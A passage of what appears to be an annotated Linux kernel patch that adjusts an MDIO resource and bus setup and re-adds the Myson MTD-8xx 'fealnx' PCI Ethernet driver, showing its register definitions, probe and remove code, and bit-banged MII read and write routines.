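  DEFINE_RES_MEM_NAMED(0x8030, 0x8040, "imdio");
  /* after: 0x10 bytes, i.e. 0x8030..0x803f */
  DEFINE_RES_MEM_NAMED(0x8030, 0x10, "imdio");
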
+diff --git a/drivers/net/dsa/ocelot/seville_vsc9953.c b/drivers/net/dsa/ocelot/seville_vsc9953.c
+index 88ed3a2e487a4..fa03254adcefd 100644
+--- a/drivers/net/dsa/ocelot/seville_vsc9953.c
++++ b/drivers/net/dsa/ocelot/seville_vsc9953.c
+@@ -893,8 +893,8 @@ static int vsc9953_mdio_bus_alloc(struct ocelot *ocelot)
+ 
+ 	rc = mscc_miim_setup(dev, &bus, "VSC9953 internal MDIO bus",
+ 			     ocelot->targets[GCB],
+-			     ocelot->map[GCB][GCB_MIIM_MII_STATUS & REG_MASK]);
+-
++			     ocelot->map[GCB][GCB_MIIM_MII_STATUS & REG_MASK],
++			     true);
+ 	if (rc) {
+ 		dev_err(dev, "failed to setup MDIO bus\n");
+ 		return rc;
+diff --git a/drivers/net/ethernet/Kconfig b/drivers/net/ethernet/Kconfig
+index 323ec56e8a74c..1917da7841919 100644
+--- a/drivers/net/ethernet/Kconfig
++++ b/drivers/net/ethernet/Kconfig
+@@ -132,6 +132,16 @@ source "drivers/net/ethernet/mscc/Kconfig"
+ source "drivers/net/ethernet/microsoft/Kconfig"
+ source "drivers/net/ethernet/moxa/Kconfig"
+ source "drivers/net/ethernet/myricom/Kconfig"
++
++config FEALNX
++	tristate "Myson MTD-8xx PCI Ethernet support"
++	depends on PCI
++	select CRC32
++	select MII
++	help
++	  Say Y here to support the Myson MTD-800 family of PCI-based Ethernet
++	  cards. <http://www.myson.com.tw/>
++
+ source "drivers/net/ethernet/ni/Kconfig"
+ source "drivers/net/ethernet/natsemi/Kconfig"
+ source "drivers/net/ethernet/neterion/Kconfig"
+diff --git a/drivers/net/ethernet/Makefile b/drivers/net/ethernet/Makefile
+index 2fedbaa545eb1..0d872d4efcd10 100644
+--- a/drivers/net/ethernet/Makefile
++++ b/drivers/net/ethernet/Makefile
+@@ -64,6 +64,7 @@ obj-$(CONFIG_NET_VENDOR_MICROCHIP) += microchip/
+ obj-$(CONFIG_NET_VENDOR_MICROSEMI) += mscc/
+ obj-$(CONFIG_NET_VENDOR_MOXART) += moxa/
+ obj-$(CONFIG_NET_VENDOR_MYRI) += myricom/
++obj-$(CONFIG_FEALNX) += fealnx.o
+ obj-$(CONFIG_NET_VENDOR_NATSEMI) += natsemi/
+ obj-$(CONFIG_NET_VENDOR_NETERION) += neterion/
+ obj-$(CONFIG_NET_VENDOR_NETRONOME) += netronome/
+diff --git a/drivers/net/ethernet/fealnx.c b/drivers/net/ethernet/fealnx.c
+new file mode 100644
+index 0000000000000..ed18450fd2cc5
+--- /dev/null
++++ b/drivers/net/ethernet/fealnx.c
+@@ -0,0 +1,1953 @@
++/*
++	Written 1998-2000 by Donald Becker.
++
++	This software may be used and distributed according to the terms of
++	the GNU General Public License (GPL), incorporated herein by reference.
++	Drivers based on or derived from this code fall under the GPL and must
++	retain the authorship, copyright and license notice.  This file is not
++	a complete program and may only be used when the entire operating
++	system is licensed under the GPL.
++
++	The author may be reached as becker@scyld.com, or C/O
++	Scyld Computing Corporation
++	410 Severn Ave., Suite 210
++	Annapolis MD 21403
++
++	Support information and updates available at
++	http://www.scyld.com/network/pci-skeleton.html
++
++	Linux kernel updates:
++
++	Version 2.51, Nov 17, 2001 (jgarzik):
++	- Add ethtool support
++	- Replace some MII-related magic numbers with constants
++
++*/
++
++#define DRV_NAME	"fealnx"
++
++static int debug;		/* 1-> print debug message */
++static int max_interrupt_work = 20;
++
++/* Maximum number of multicast addresses to filter (vs. Rx-all-multicast). */
++static int multicast_filter_limit = 32;
++
++/* Set the copy breakpoint for the copy-only-tiny-frames scheme. */
++/* Setting to > 1518 effectively disables this feature.          */
++static int rx_copybreak;
++
++/* Used to pass the media type, etc.                            */
++/* Both 'options[]' and 'full_duplex[]' should exist for driver */
++/* interoperability.                                            */
++/* The media type is usually passed in 'options[]'.             */
++#define MAX_UNITS 8		/* More are supported, limit only on options */
++static int options[MAX_UNITS] = { -1, -1, -1, -1, -1, -1, -1, -1 };
++static int full_duplex[MAX_UNITS] = { -1, -1, -1, -1, -1, -1, -1, -1 };
++
++/* Operational parameters that are set at compile time.                 */
++/* Keep the ring sizes a power of two for compile efficiency.           */
++/* The compiler will convert <unsigned>'%'<2^N> into a bit mask.        */
++/* Making the Tx ring too large decreases the effectiveness of channel  */
++/* bonding and packet priority.                                         */
++/* There are no ill effects from too-large receive rings.               */
++// 88-12-9 modify,
++// #define TX_RING_SIZE    16
++// #define RX_RING_SIZE    32
++#define TX_RING_SIZE    6
++#define RX_RING_SIZE    12
++#define TX_TOTAL_SIZE	TX_RING_SIZE*sizeof(struct fealnx_desc)
++#define RX_TOTAL_SIZE	RX_RING_SIZE*sizeof(struct fealnx_desc)
++
++/* Operational parameters that usually are not changed. */
++/* Time in jiffies before concluding the transmitter is hung. */
++#define TX_TIMEOUT      (2*HZ)
++
++#define PKT_BUF_SZ      1536	/* Size of each temporary Rx buffer. */
++
++
++/* Include files, designed to support most kernel versions 2.0.0 and later. */
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/string.h>
++#include <linux/timer.h>
++#include <linux/errno.h>
++#include <linux/ioport.h>
++#include <linux/interrupt.h>
++#include <linux/pci.h>
++#include <linux/netdevice.h>
++#include <linux/etherdevice.h>
++#include <linux/skbuff.h>
++#include <linux/init.h>
++#include <linux/mii.h>
++#include <linux/ethtool.h>
++#include <linux/crc32.h>
++#include <linux/delay.h>
++#include <linux/bitops.h>
++
++#include <asm/processor.h>	/* Processor type for cache alignment. */
++#include <asm/io.h>
++#include <linux/uaccess.h>
++#include <asm/byteorder.h>
++
++/* This driver was written to use PCI memory space, however some x86 systems
++   work only with I/O space accesses. */
++#ifndef __alpha__
++#define USE_IO_OPS
++#endif
++
++/* Kernel compatibility defines, some common to David Hinds' PCMCIA package. */
++/* This is only in the support-all-kernels source code. */
++
++#define RUN_AT(x) (jiffies + (x))
++
++MODULE_AUTHOR("Myson or whoever");
++MODULE_DESCRIPTION("Myson MTD-8xx 100/10M Ethernet PCI Adapter Driver");
++MODULE_LICENSE("GPL");
++module_param(max_interrupt_work, int, 0);
++module_param(debug, int, 0);
++module_param(rx_copybreak, int, 0);
++module_param(multicast_filter_limit, int, 0);
++module_param_array(options, int, NULL, 0);
++module_param_array(full_duplex, int, NULL, 0);
++MODULE_PARM_DESC(max_interrupt_work, "fealnx maximum events handled per interrupt");
++MODULE_PARM_DESC(debug, "fealnx enable debugging (0-1)");
++MODULE_PARM_DESC(rx_copybreak, "fealnx copy breakpoint for copy-only-tiny-frames");
++MODULE_PARM_DESC(multicast_filter_limit, "fealnx maximum number of filtered multicast addresses");
++MODULE_PARM_DESC(options, "fealnx: Bits 0-3: media type, bit 17: full duplex");
++MODULE_PARM_DESC(full_duplex, "fealnx full duplex setting(s) (1)");
++
++enum {
++	MIN_REGION_SIZE		= 136,
++};
++
++/* A chip capabilities table, matching the entries in pci_tbl[] above. */
++enum chip_capability_flags {
++	HAS_MII_XCVR,
++	HAS_CHIP_XCVR,
++};
++
++/* 89/6/13 add, */
++/* for different PHY */
++enum phy_type_flags {
++	MysonPHY = 1,
++	AhdocPHY = 2,
++	SeeqPHY = 3,
++	MarvellPHY = 4,
++	Myson981 = 5,
++	LevelOnePHY = 6,
++	OtherPHY = 10,
++};
++
++struct chip_info {
++	char *chip_name;
++	int flags;
++};
++
++static const struct chip_info skel_netdrv_tbl[] = {
++	{ "100/10M Ethernet PCI Adapter",	HAS_MII_XCVR },
++	{ "100/10M Ethernet PCI Adapter",	HAS_CHIP_XCVR },
++	{ "1000/100/10M Ethernet PCI Adapter",	HAS_MII_XCVR },
++};
++
++/* Offsets to the Command and Status Registers. */
++enum fealnx_offsets {
++	PAR0 = 0x0,		/* physical address 0-3 */
++	PAR1 = 0x04,		/* physical address 4-5 */
++	MAR0 = 0x08,		/* multicast address 0-3 */
++	MAR1 = 0x0C,		/* multicast address 4-7 */
++	FAR0 = 0x10,		/* flow-control address 0-3 */
++	FAR1 = 0x14,		/* flow-control address 4-5 */
++	TCRRCR = 0x18,		/* receive & transmit configuration */
++	BCR = 0x1C,		/* bus command */
++	TXPDR = 0x20,		/* transmit polling demand */
++	RXPDR = 0x24,		/* receive polling demand */
++	RXCWP = 0x28,		/* receive current word pointer */
++	TXLBA = 0x2C,		/* transmit list base address */
++	RXLBA = 0x30,		/* receive list base address */
++	ISR = 0x34,		/* interrupt status */
++	IMR = 0x38,		/* interrupt mask */
++	FTH = 0x3C,		/* flow control high/low threshold */
++	MANAGEMENT = 0x40,	/* bootrom/eeprom and mii management */
++	TALLY = 0x44,		/* tally counters for crc and mpa */
++	TSR = 0x48,		/* tally counter for transmit status */
++	BMCRSR = 0x4c,		/* basic mode control and status */
++	PHYIDENTIFIER = 0x50,	/* phy identifier */
++	ANARANLPAR = 0x54,	/* auto-negotiation advertisement and link
++				   partner ability */
++	ANEROCR = 0x58,		/* auto-negotiation expansion and pci conf. */
++	BPREMRPSR = 0x5c,	/* bypass & receive error mask and phy status */
++};
++
++/* Bits in the interrupt status/enable registers. */
++/* The bits in the Intr Status/Enable registers, mostly interrupt sources. */
++enum intr_status_bits {
++	RFCON = 0x00020000,	/* receive flow control xon packet */
++	RFCOFF = 0x00010000,	/* receive flow control xoff packet */
++	LSCStatus = 0x00008000,	/* link status change */
++	ANCStatus = 0x00004000,	/* autonegotiation completed */
++	FBE = 0x00002000,	/* fatal bus error */
++	FBEMask = 0x00001800,	/* mask bit12-11 */
++	ParityErr = 0x00000000,	/* parity error */
++	TargetErr = 0x00001000,	/* target abort */
++	MasterErr = 0x00000800,	/* master error */
++	TUNF = 0x00000400,	/* transmit underflow */
++	ROVF = 0x00000200,	/* receive overflow */
++	ETI = 0x00000100,	/* transmit early int */
++	ERI = 0x00000080,	/* receive early int */
++	CNTOVF = 0x00000040,	/* counter overflow */
++	RBU = 0x00000020,	/* receive buffer unavailable */
++	TBU = 0x00000010,	/* transmit buffer unavailable */
++	TI = 0x00000008,	/* transmit interrupt */
++	RI = 0x00000004,	/* receive interrupt */
++	RxErr = 0x00000002,	/* receive error */
++};
++
++/* Bits in the NetworkConfig register, W for writing, R for reading */
++/* FIXME: some names are invented by me. Marked with (name?) */
++/* If you have docs and know bit names, please fix 'em */
++enum rx_mode_bits {
++	CR_W_ENH	= 0x02000000,	/* enhanced mode (name?) */
++	CR_W_FD		= 0x00100000,	/* full duplex */
++	CR_W_PS10	= 0x00080000,	/* 10 mbit */
++	CR_W_TXEN	= 0x00040000,	/* tx enable (name?) */
++	CR_W_PS1000	= 0x00010000,	/* 1000 mbit */
++     /* CR_W_RXBURSTMASK= 0x00000e00, I'm unsure about this */
++	CR_W_RXMODEMASK	= 0x000000e0,
++	CR_W_PROM	= 0x00000080,	/* promiscuous mode */
++	CR_W_AB		= 0x00000040,	/* accept broadcast */
++	CR_W_AM		= 0x00000020,	/* accept multicast */
++	CR_W_ARP	= 0x00000008,	/* receive runt pkt */
++	CR_W_ALP	= 0x00000004,	/* receive long pkt */
++	CR_W_SEP	= 0x00000002,	/* receive error pkt */
++	CR_W_RXEN	= 0x00000001,	/* rx enable (unicast?) (name?) */
++
++	CR_R_TXSTOP	= 0x04000000,	/* tx stopped (name?) */
++	CR_R_FD		= 0x00100000,	/* full duplex detected */
++	CR_R_PS10	= 0x00080000,	/* 10 mbit detected */
++	CR_R_RXSTOP	= 0x00008000,	/* rx stopped (name?) */
++};
++
++/* The Tulip Rx and Tx buffer descriptors. */
++struct fealnx_desc {
++	s32 status;
++	s32 control;
++	u32 buffer;
++	u32 next_desc;
++	struct fealnx_desc *next_desc_logical;
++	struct sk_buff *skbuff;
++	u32 reserved1;
++	u32 reserved2;
++};
++
++/* Bits in network_desc.status */
++enum rx_desc_status_bits {
++	RXOWN = 0x80000000,	/* own bit */
++	FLNGMASK = 0x0fff0000,	/* frame length */
++	FLNGShift = 16,
++	MARSTATUS = 0x00004000,	/* multicast address received */
++	BARSTATUS = 0x00002000,	/* broadcast address received */
++	PHYSTATUS = 0x00001000,	/* physical address received */
++	RXFSD = 0x00000800,	/* first descriptor */
++	RXLSD = 0x00000400,	/* last descriptor */
++	ErrorSummary = 0x80,	/* error summary */
++	RUNTPKT = 0x40,		/* runt packet received */
++	LONGPKT = 0x20,		/* long packet received */
++	FAE = 0x10,		/* frame align error */
++	CRC = 0x08,		/* crc error */
++	RXER = 0x04,		/* receive error */
++};
++
++enum rx_desc_control_bits {
++	RXIC = 0x00800000,	/* interrupt control */
++	RBSShift = 0,
++};
++
++enum tx_desc_status_bits {
++	TXOWN = 0x80000000,	/* own bit */
++	JABTO = 0x00004000,	/* jabber timeout */
++	CSL = 0x00002000,	/* carrier sense lost */
++	LC = 0x00001000,	/* late collision */
++	EC = 0x00000800,	/* excessive collision */
++	UDF = 0x00000400,	/* fifo underflow */
++	DFR = 0x00000200,	/* deferred */
++	HF = 0x00000100,	/* heartbeat fail */
++	NCRMask = 0x000000ff,	/* collision retry count */
++	NCRShift = 0,
++};
++
++enum tx_desc_control_bits {
++	TXIC = 0x80000000,	/* interrupt control */
++	ETIControl = 0x40000000,	/* early transmit interrupt */
++	TXLD = 0x20000000,	/* last descriptor */
++	TXFD = 0x10000000,	/* first descriptor */
++	CRCEnable = 0x08000000,	/* crc control */
++	PADEnable = 0x04000000,	/* padding control */
++	RetryTxLC = 0x02000000,	/* retry late collision */
++	PKTSMask = 0x3ff800,	/* packet size bit21-11 */
++	PKTSShift = 11,
++	TBSMask = 0x000007ff,	/* transmit buffer bit 10-0 */
++	TBSShift = 0,
++};
++
++/* BootROM/EEPROM/MII Management Register */
++#define MASK_MIIR_MII_READ       0x00000000
++#define MASK_MIIR_MII_WRITE      0x00000008
++#define MASK_MIIR_MII_MDO        0x00000004
++#define MASK_MIIR_MII_MDI        0x00000002
++#define MASK_MIIR_MII_MDC        0x00000001
++
++/* ST+OP+PHYAD+REGAD+TA */
++#define OP_READ             0x6000	/* ST:01+OP:10+PHYAD+REGAD+TA:Z0 */
++#define OP_WRITE            0x5002	/* ST:01+OP:01+PHYAD+REGAD+TA:10 */
++
++/* ------------------------------------------------------------------------- */
++/*      Constants for Myson PHY                                              */
++/* ------------------------------------------------------------------------- */
++#define MysonPHYID      0xd0000302
++/* 89-7-27 add, (begin) */
++#define MysonPHYID0     0x0302
++#define StatusRegister  18
++#define SPEED100        0x0400	// bit10
++#define FULLMODE        0x0800	// bit11
++/* 89-7-27 add, (end) */
++
++/* ------------------------------------------------------------------------- */
++/*      Constants for Seeq 80225 PHY                                         */
++/* ------------------------------------------------------------------------- */
++#define SeeqPHYID0      0x0016
++
++#define MIIRegister18   18
++#define SPD_DET_100     0x80
++#define DPLX_DET_FULL   0x40
++
++/* ------------------------------------------------------------------------- */
++/*      Constants for Ahdoc 101 PHY                                          */
++/* ------------------------------------------------------------------------- */
++#define AhdocPHYID0     0x0022
++
++#define DiagnosticReg   18
++#define DPLX_FULL       0x0800
++#define Speed_100       0x0400
++
++/* 89/6/13 add, */
++/* -------------------------------------------------------------------------- */
++/*      Constants                                                             */
++/* -------------------------------------------------------------------------- */
++#define MarvellPHYID0           0x0141
++#define LevelOnePHYID0		0x0013
++
++#define MII1000BaseTControlReg  9
++#define MII1000BaseTStatusReg   10
++#define SpecificReg		17
++
++/* for 1000BaseT Control Register */
++#define PHYAbletoPerform1000FullDuplex  0x0200
++#define PHYAbletoPerform1000HalfDuplex  0x0100
++#define PHY1000AbilityMask              0x300
++
++// for phy specific status register, marvell phy.
++#define SpeedMask       0x0c000
++#define Speed_1000M     0x08000
++#define Speed_100M      0x4000
++#define Speed_10M       0
++#define Full_Duplex     0x2000
++
++// 89/12/29 add, for phy specific status register, levelone phy, (begin)
++#define LXT1000_100M    0x08000
++#define LXT1000_1000M   0x0c000
++#define LXT1000_Full    0x200
++// 89/12/29 add, for phy specific status register, levelone phy, (end)
++
++/* for 3-in-1 case, BMCRSR register */
++#define LinkIsUp2	0x00040000
++
++/* for PHY */
++#define LinkIsUp        0x0004
++
++
++struct netdev_private {
++	/* Descriptor rings first for alignment. */
++	struct fealnx_desc *rx_ring;
++	struct fealnx_desc *tx_ring;
++
++	dma_addr_t rx_ring_dma;
++	dma_addr_t tx_ring_dma;
++
++	spinlock_t lock;
++
++	/* Media monitoring timer. */
++	struct timer_list timer;
++
++	/* Reset timer */
++	struct timer_list reset_timer;
++	int reset_timer_armed;
++	unsigned long crvalue_sv;
++	unsigned long imrvalue_sv;
++
++	/* Frequently used values: keep some adjacent for cache effect. */
++	int flags;
++	struct pci_dev *pci_dev;
++	unsigned long crvalue;
++	unsigned long bcrvalue;
++	unsigned long imrvalue;
++	struct fealnx_desc *cur_rx;
++	struct fealnx_desc *lack_rxbuf;
++	int really_rx_count;
++	struct fealnx_desc *cur_tx;
++	struct fealnx_desc *cur_tx_copy;
++	int really_tx_count;
++	int free_tx_count;
++	unsigned int rx_buf_sz;	/* Based on MTU+slack. */
++
++	/* These values keep track of the transceiver/media in use. */
++	unsigned int linkok;
++	unsigned int line_speed;
++	unsigned int duplexmode;
++	unsigned int default_port:4;	/* Last dev->if_port value. */
++	unsigned int PHYType;
++
++	/* MII transceiver section. */
++	int mii_cnt;		/* MII device addresses. */
++	unsigned char phys[2];	/* MII device addresses. */
++	struct mii_if_info mii;
++	void __iomem *mem;
++};
++
++
++static int mdio_read(struct net_device *dev, int phy_id, int location);
++static void mdio_write(struct net_device *dev, int phy_id, int location, int value);
++static int netdev_open(struct net_device *dev);
++static void getlinktype(struct net_device *dev);
++static void getlinkstatus(struct net_device *dev);
++static void netdev_timer(struct timer_list *t);
++static void reset_timer(struct timer_list *t);
++static void fealnx_tx_timeout(struct net_device *dev, unsigned int txqueue);
++static void init_ring(struct net_device *dev);
++static netdev_tx_t start_tx(struct sk_buff *skb, struct net_device *dev);
++static irqreturn_t intr_handler(int irq, void *dev_instance);
++static int netdev_rx(struct net_device *dev);
++static void set_rx_mode(struct net_device *dev);
++static void __set_rx_mode(struct net_device *dev);
++static struct net_device_stats *get_stats(struct net_device *dev);
++static int mii_ioctl(struct net_device *dev, struct ifreq *rq, int cmd);
++static const struct ethtool_ops netdev_ethtool_ops;
++static int netdev_close(struct net_device *dev);
++static void reset_rx_descriptors(struct net_device *dev);
++static void reset_tx_descriptors(struct net_device *dev);
++
++static void stop_nic_rx(void __iomem *ioaddr, long crvalue)
++{
++	int delay = 0x1000;
++	iowrite32(crvalue & ~(CR_W_RXEN), ioaddr + TCRRCR);
++	while (--delay) {
++		if ( (ioread32(ioaddr + TCRRCR) & CR_R_RXSTOP) == CR_R_RXSTOP)
++			break;
++	}
++}
++
++
++static void stop_nic_rxtx(void __iomem *ioaddr, long crvalue)
++{
++	int delay = 0x1000;
++	iowrite32(crvalue & ~(CR_W_RXEN+CR_W_TXEN), ioaddr + TCRRCR);
++	while (--delay) {
++		if ( (ioread32(ioaddr + TCRRCR) & (CR_R_RXSTOP+CR_R_TXSTOP))
++					    == (CR_R_RXSTOP+CR_R_TXSTOP) )
++			break;
++	}
++}
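
Both helpers poll a status register with a bounded busy-wait. A modern equivalent would use the iopoll helpers; a hedged sketch follows, purely for illustration, since the driver keeps its open-coded loop, which predates linux/iopoll.h:

  /* Illustrative only -- not part of the patch. */
  u32 val;
  int ret = read_poll_timeout(ioread32, val,
  			    (val & CR_R_RXSTOP) == CR_R_RXSTOP,
  			    0, 10000, false, ioaddr + TCRRCR);
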
++
++static const struct net_device_ops netdev_ops = {
++	.ndo_open		= netdev_open,
++	.ndo_stop		= netdev_close,
++	.ndo_start_xmit		= start_tx,
++	.ndo_get_stats 		= get_stats,
++	.ndo_set_rx_mode	= set_rx_mode,
++	.ndo_eth_ioctl		= mii_ioctl,
++	.ndo_tx_timeout		= fealnx_tx_timeout,
++	.ndo_set_mac_address 	= eth_mac_addr,
++	.ndo_validate_addr	= eth_validate_addr,
++};
++
++static int fealnx_init_one(struct pci_dev *pdev,
++			   const struct pci_device_id *ent)
++{
++	struct netdev_private *np;
++	int i, option, err, irq;
++	static int card_idx = -1;
++	char boardname[12];
++	void __iomem *ioaddr;
++	unsigned long len;
++	unsigned int chip_id = ent->driver_data;
++	struct net_device *dev;
++	void *ring_space;
++	dma_addr_t ring_dma;
++	u8 addr[ETH_ALEN];
++#ifdef USE_IO_OPS
++	int bar = 0;
++#else
++	int bar = 1;
++#endif
++
++	card_idx++;
++	sprintf(boardname, "fealnx%d", card_idx);
++
++	option = card_idx < MAX_UNITS ? options[card_idx] : 0;
++
++	i = pci_enable_device(pdev);
++	if (i) return i;
++	pci_set_master(pdev);
++
++	len = pci_resource_len(pdev, bar);
++	if (len < MIN_REGION_SIZE) {
++		dev_err(&pdev->dev,
++			   "region size %ld too small, aborting\n", len);
++		return -ENODEV;
++	}
++
++	i = pci_request_regions(pdev, boardname);
++	if (i)
++		return i;
++
++	irq = pdev->irq;
++
++	ioaddr = pci_iomap(pdev, bar, len);
++	if (!ioaddr) {
++		err = -ENOMEM;
++		goto err_out_res;
++	}
++
++	dev = alloc_etherdev(sizeof(struct netdev_private));
++	if (!dev) {
++		err = -ENOMEM;
++		goto err_out_unmap;
++	}
++	SET_NETDEV_DEV(dev, &pdev->dev);
++
++	/* read ethernet id */
++	for (i = 0; i < 6; ++i)
++		addr[i] = ioread8(ioaddr + PAR0 + i);
++	eth_hw_addr_set(dev, addr);
++
++	/* Reset the chip to erase previous misconfiguration. */
++	iowrite32(0x00000001, ioaddr + BCR);
++
++	/* Make certain the descriptor lists are aligned. */
++	np = netdev_priv(dev);
++	np->mem = ioaddr;
++	spin_lock_init(&np->lock);
++	np->pci_dev = pdev;
++	np->flags = skel_netdrv_tbl[chip_id].flags;
++	pci_set_drvdata(pdev, dev);
++	np->mii.dev = dev;
++	np->mii.mdio_read = mdio_read;
++	np->mii.mdio_write = mdio_write;
++	np->mii.phy_id_mask = 0x1f;
++	np->mii.reg_num_mask = 0x1f;
++
++	ring_space = dma_alloc_coherent(&pdev->dev, RX_TOTAL_SIZE, &ring_dma,
++					GFP_KERNEL);
++	if (!ring_space) {
++		err = -ENOMEM;
++		goto err_out_free_dev;
++	}
++	np->rx_ring = ring_space;
++	np->rx_ring_dma = ring_dma;
++
++	ring_space = dma_alloc_coherent(&pdev->dev, TX_TOTAL_SIZE, &ring_dma,
++					GFP_KERNEL);
++	if (!ring_space) {
++		err = -ENOMEM;
++		goto err_out_free_rx;
++	}
++	np->tx_ring = ring_space;
++	np->tx_ring_dma = ring_dma;
++
++	/* find the connected MII xcvrs */
++	if (np->flags == HAS_MII_XCVR) {
++		int phy, phy_idx = 0;
++
++		for (phy = 1; phy < 32 && phy_idx < ARRAY_SIZE(np->phys);
++			       phy++) {
++			int mii_status = mdio_read(dev, phy, 1);
++
++			if (mii_status != 0xffff && mii_status != 0x0000) {
++				np->phys[phy_idx++] = phy;
++				dev_info(&pdev->dev,
++				       "MII PHY found at address %d, status "
++				       "0x%4.4x.\n", phy, mii_status);
++				/* get phy type */
++				{
++					unsigned int data;
++
++					data = mdio_read(dev, np->phys[0], 2);
++					if (data == SeeqPHYID0)
++						np->PHYType = SeeqPHY;
++					else if (data == AhdocPHYID0)
++						np->PHYType = AhdocPHY;
++					else if (data == MarvellPHYID0)
++						np->PHYType = MarvellPHY;
++					else if (data == MysonPHYID0)
++						np->PHYType = Myson981;
++					else if (data == LevelOnePHYID0)
++						np->PHYType = LevelOnePHY;
++					else
++						np->PHYType = OtherPHY;
++				}
++			}
++		}
++
++		np->mii_cnt = phy_idx;
++		if (phy_idx == 0)
++			dev_warn(&pdev->dev,
++				"MII PHY not found -- this device may "
++			       "not operate correctly.\n");
++	} else {
++		np->phys[0] = 32;
++/* 89/6/23 add, (begin) */
++		/* get phy type */
++		if (ioread32(ioaddr + PHYIDENTIFIER) == MysonPHYID)
++			np->PHYType = MysonPHY;
++		else
++			np->PHYType = OtherPHY;
++	}
++	np->mii.phy_id = np->phys[0];
++
++	if (dev->mem_start)
++		option = dev->mem_start;
++
++	/* The lower four bits are the media type. */
++	if (option > 0) {
++		if (option & 0x200)
++			np->mii.full_duplex = 1;
++		np->default_port = option & 15;
++	}
++
++	if (card_idx < MAX_UNITS && full_duplex[card_idx] > 0)
++		np->mii.full_duplex = full_duplex[card_idx];
++
++	if (np->mii.full_duplex) {
++		dev_info(&pdev->dev, "Media type forced to Full Duplex.\n");
++/* 89/6/13 add, (begin) */
++//      if (np->PHYType==MarvellPHY)
++		if ((np->PHYType == MarvellPHY) || (np->PHYType == LevelOnePHY)) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], 9);
++			data = (data & 0xfcff) | 0x0200;
++			mdio_write(dev, np->phys[0], 9, data);
++		}
++/* 89/6/13 add, (end) */
++		if (np->flags == HAS_MII_XCVR)
++			mdio_write(dev, np->phys[0], MII_ADVERTISE, ADVERTISE_FULL);
++		else
++			iowrite32(ADVERTISE_FULL, ioaddr + ANARANLPAR);
++		np->mii.force_media = 1;
++	}
++
++	dev->netdev_ops = &netdev_ops;
++	dev->ethtool_ops = &netdev_ethtool_ops;
++	dev->watchdog_timeo = TX_TIMEOUT;
++
++	err = register_netdev(dev);
++	if (err)
++		goto err_out_free_tx;
++
++	printk(KERN_INFO "%s: %s at %p, %pM, IRQ %d.\n",
++	       dev->name, skel_netdrv_tbl[chip_id].chip_name, ioaddr,
++	       dev->dev_addr, irq);
++
++	return 0;
++
++err_out_free_tx:
++	dma_free_coherent(&pdev->dev, TX_TOTAL_SIZE, np->tx_ring,
++			  np->tx_ring_dma);
++err_out_free_rx:
++	dma_free_coherent(&pdev->dev, RX_TOTAL_SIZE, np->rx_ring,
++			  np->rx_ring_dma);
++err_out_free_dev:
++	free_netdev(dev);
++err_out_unmap:
++	pci_iounmap(pdev, ioaddr);
++err_out_res:
++	pci_release_regions(pdev);
++	return err;
++}
++
++
++static void fealnx_remove_one(struct pci_dev *pdev)
++{
++	struct net_device *dev = pci_get_drvdata(pdev);
++
++	if (dev) {
++		struct netdev_private *np = netdev_priv(dev);
++
++		dma_free_coherent(&pdev->dev, TX_TOTAL_SIZE, np->tx_ring,
++				  np->tx_ring_dma);
++		dma_free_coherent(&pdev->dev, RX_TOTAL_SIZE, np->rx_ring,
++				  np->rx_ring_dma);
++		unregister_netdev(dev);
++		pci_iounmap(pdev, np->mem);
++		free_netdev(dev);
++		pci_release_regions(pdev);
++	} else
++		printk(KERN_ERR "fealnx: remove for unknown device\n");
++}
++
++
++static ulong m80x_send_cmd_to_phy(void __iomem *miiport, int opcode, int phyad, int regad)
++{
++	ulong miir;
++	int i;
++	unsigned int mask, data;
++
++	/* enable MII output */
++	miir = (ulong) ioread32(miiport);
++	miir &= 0xfffffff0;
++
++	miir |= MASK_MIIR_MII_WRITE + MASK_MIIR_MII_MDO;
++
++	/* send 32 1's preamble */
++	for (i = 0; i < 32; i++) {
++		/* low MDC; MDO is already high (miir) */
++		miir &= ~MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++
++		/* high MDC */
++		miir |= MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++	}
++
++	/* calculate ST+OP+PHYAD+REGAD+TA */
++	data = opcode | (phyad << 7) | (regad << 2);
++
++	/* sent out */
++	mask = 0x8000;
++	while (mask) {
++		/* low MDC, prepare MDO */
++		miir &= ~(MASK_MIIR_MII_MDC + MASK_MIIR_MII_MDO);
++		if (mask & data)
++			miir |= MASK_MIIR_MII_MDO;
++
++		iowrite32(miir, miiport);
++		/* high MDC */
++		miir |= MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++		udelay(30);
++
++		/* next */
++		mask >>= 1;
++		if (mask == 0x2 && opcode == OP_READ)
++			miir &= ~MASK_MIIR_MII_WRITE;
++	}
++	return miir;
++}
++
++
++static int mdio_read(struct net_device *dev, int phyad, int regad)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *miiport = np->mem + MANAGEMENT;
++	ulong miir;
++	unsigned int mask, data;
++
++	miir = m80x_send_cmd_to_phy(miiport, OP_READ, phyad, regad);
++
++	/* read data */
++	mask = 0x8000;
++	data = 0;
++	while (mask) {
++		/* low MDC */
++		miir &= ~MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++
++		/* read MDI */
++		miir = ioread32(miiport);
++		if (miir & MASK_MIIR_MII_MDI)
++			data |= mask;
++
++		/* high MDC, and wait */
++		miir |= MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++		udelay(30);
++
++		/* next */
++		mask >>= 1;
++	}
++
++	/* low MDC */
++	miir &= ~MASK_MIIR_MII_MDC;
++	iowrite32(miir, miiport);
++
++	return data & 0xffff;
++}
++
++
++static void mdio_write(struct net_device *dev, int phyad, int regad, int data)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *miiport = np->mem + MANAGEMENT;
++	ulong miir;
++	unsigned int mask;
++
++	miir = m80x_send_cmd_to_phy(miiport, OP_WRITE, phyad, regad);
++
++	/* write data */
++	mask = 0x8000;
++	while (mask) {
++		/* low MDC, prepare MDO */
++		miir &= ~(MASK_MIIR_MII_MDC + MASK_MIIR_MII_MDO);
++		if (mask & data)
++			miir |= MASK_MIIR_MII_MDO;
++		iowrite32(miir, miiport);
++
++		/* high MDC */
++		miir |= MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++
++		/* next */
++		mask >>= 1;
++	}
++
++	/* low MDC */
++	miir &= ~MASK_MIIR_MII_MDC;
++	iowrite32(miir, miiport);
++}
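
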